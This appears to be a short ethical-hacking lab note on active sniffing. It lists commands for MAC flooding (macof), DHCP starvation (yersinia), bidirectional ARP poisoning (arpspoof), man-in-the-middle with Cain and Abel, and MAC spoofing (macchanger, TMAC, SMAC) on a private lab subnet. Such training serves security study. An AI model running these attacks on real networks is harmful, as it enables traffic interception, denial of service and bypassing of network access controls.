1. Perform Active Sniffing

References

1. Perform mac flooding using macof

sudo macof -i ens33 -n 10

-i interface

-n number of packets to send

targeting an IP address

sudo macof -i ens33 -d 192.168.18.1

2. DHCP starvation using yersinia

Start the Yersinia in an interactive mode.

sudo yersinia -I

press h for help, q to exit help

F2 to open DHCP attack mode. DHCP fields will be shown in the bottom

press x to list attack options and the type 1 to conduct DHCP starvation attack.

3. Perform arp poisoning using arpspoof

Use the following command

arpspoof -i eth0 -t 192.168.18.1 192.168.18.14

192.168.18.14 is the target IP

Now poison the other machine

arpspoof -i eth0 -t 192.168.18.14 192.168.18.1

4. Man in the Middle attack using cain and able

5. Spoof mac with TMAC and SMAC

https://technitium.com/tmac/

https://smac-tool.com/

6. Spoof Linux mac using macchanger

ifconfig eth0 down
Macchanger –r eth0
Ifconfig eth0 up

To view the mac address

macchanger -s eth0

Last updated